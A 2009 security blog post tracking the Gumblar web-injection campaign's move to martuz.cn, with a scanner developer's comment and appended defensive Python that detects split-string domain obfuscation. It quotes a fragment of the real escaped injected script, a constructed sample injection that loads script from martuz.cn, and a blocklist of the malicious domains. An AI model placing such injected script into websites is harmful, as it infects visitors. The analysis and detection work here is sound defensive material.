Monday, May 18, 2009

Gumblar Morphs Again: Now Martuz.cn

The Gumblar attacks have morphed again, this time pulling the malcode from martuz.cn. In addition, the reference URI remains slightly obfuscated - perhaps an attempt to thwart rudimentary blacklists. The injected script assembles the URI from concatenated string fragments, so the domain appears in the page source as mar"+"tuz.cn instead of just martuz.cn, and a plain substring match for martuz.cn will miss it. According to Robtex, the domain resolves to 95.129.145.58.

It's too early to tell yet how this latest Gumblar series of compromises will play out - but we will continue to watch it closely and report the numbers as we see them. Currently we've seen only a couple hundred martuz.cn compromised domains, but that's because we're an enterprise-focused service and there's considerably less traffic on the weekends. A clearer picture should emerge later today as to whether the martuz.cn attacks will continue to grow as rapidly as did the gumblar.cn compromises.

If you own a website, large or small, you may want to take a short hike over to Unmask Parasites (http://www.unmaskparasites.com/) and use their free online tool to check whether any of the sites you own are exhibiting signs of compromise. It's a great tool but there are a couple of things to keep in mind.

The tool is in beta and may not be 100% accurate. When we ran known Gumblar-compromised domain names through it, Unmask Parasites appeared to flag them only as "This page seems to be <suspicious>". In other words, you need to take the word 'suspicious' very seriously.

As we get new information, we'll continue to post Gumblar updates to the blog.


Reader Comments (1)

Hi,

I'm the Unmask Parasites developer. Thanks for referencing my online tool.

I'd like to comment on how to read the results. If the tool says "<suspicious>" it explains why it thinks the page is suspicious.

In the case of Gumblar-infected sites it will add something like "1 suspicious inline script found." and in the "Suspicious Inline Scripts" section of the report, you'll find an excerpt of that suspicious script (so that you know what you should be looking for). For example:
(function(){var Ddd='%';var SpQs='v~61r~20a~3d~22ScriptEngine~22~2cb~3d~22V~65r~73ion(~29+~22~2c~6a...

One more important point. "Suspicious" doesn't mean "malicious". Unmask Parasites just highlights code that can be a sign of a security issue.

As said above, Unmask Parasites is not 100% accurate. It detects only certain types of security issues (many but not all). And it only scans individual web pages, not whole websites.

May 18, 2009 | Unregistered Commenter Denis
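The two obfuscation tricks mentioned on this page, the split-string domain (mar"+"tuz.cn) described in the post and the "~"-escaped literal shown in the commenter's report excerpt, both defeat a naive blacklist match on raw page source. The following Python is an added example, not code from the post or from Unmask Parasites: it folds adjacent string-literal concatenations back together before matching inline-script content against a blocklist, and it decodes the "~hh" escapes (the excerpt's `var Ddd='%'` suggests the script swaps "~" for "%" and runs unescape() at runtime) so a responder can read what the literal contains. The sample HTML, the tilde-escaped string and the blocklist are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample of an injected script, modelled on the obfuscation the post
# describes: the domain is split as "mar"+"tuz.cn", so a raw substring match misses it.
SAMPLE_HTML = """<html><body>
<script>
var s=document.createElement("script");
s.src="http://"+"mar"+"tuz.cn"+"/vid/?id=1";
document.body.appendChild(s);
</script>
</body></html>"""

# Constructed sample in the style of the commenter's excerpt: "~" stands in for "%",
# so the literal is really URL-escaped JavaScript source.
SAMPLE_TILDE = "v~61r~20a~3d~22ScriptEngine~22"

# Constructed blocklist of the two domains named on the page.
BLOCKLIST = {"gumblar.cn", "martuz.cn"}

# Two adjacent string literals with the same quote character joined by "+",
# e.g. "mar"+"tuz.cn" or 'mar' + 'tuz.cn'.
_CONCAT = re.compile(r'''(["'])((?:(?!\1).)*)\1\s*\+\s*\1((?:(?!\1).)*)\1''')
# A dotted host name not preceded by another name character.
_DOMAIN = re.compile(r'(?<![\w.-])([a-z0-9-]+(?:\.[a-z0-9-]+)+)', re.I)


def collapse_concatenation(js: str) -> str:
    """Repeatedly fold "a"+"b" into "ab" until no adjacent literals remain."""
    prev = None
    while prev != js:
        prev = js
        js = _CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(3) + m.group(1), js)
    return js


def decode_tilde_escapes(literal: str) -> str:
    """Undo the "~hh" encoding: swap "~" for "%" and percent-decode, which is
    what the injected script does at runtime before executing the result."""
    return unquote(literal.replace("~", "%"))


def find_blocklisted(html: str, blocklist: set, normalize: bool = True) -> set:
    """Return blocklisted domains referenced from inline <script> blocks.
    With normalize=False this is the naive check that the split-string trick defeats."""
    hits = set()
    for script in re.findall(r"<script[^>]*>(.*?)</script>", html, re.I | re.S):
        text = collapse_concatenation(script) if normalize else script
        for host in _DOMAIN.findall(text):
            if host.lower() in blocklist:
                hits.add(host.lower())
    return hits


if __name__ == "__main__":
    print("naive match:     ", find_blocklisted(SAMPLE_HTML, BLOCKLIST, normalize=False))
    print("normalized match:", find_blocklisted(SAMPLE_HTML, BLOCKLIST))
    print("decoded literal: ", decode_tilde_escapes(SAMPLE_TILDE))
```

The naive pass returns nothing because the only dotted token in the raw script is "tuz.cn"; after folding the concatenation the full martuz.cn host is visible and matches. The decoded literal reads `var a="ScriptEngine"`, the beginning of the browser-fingerprinting code the excerpt on this page shows in escaped form.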
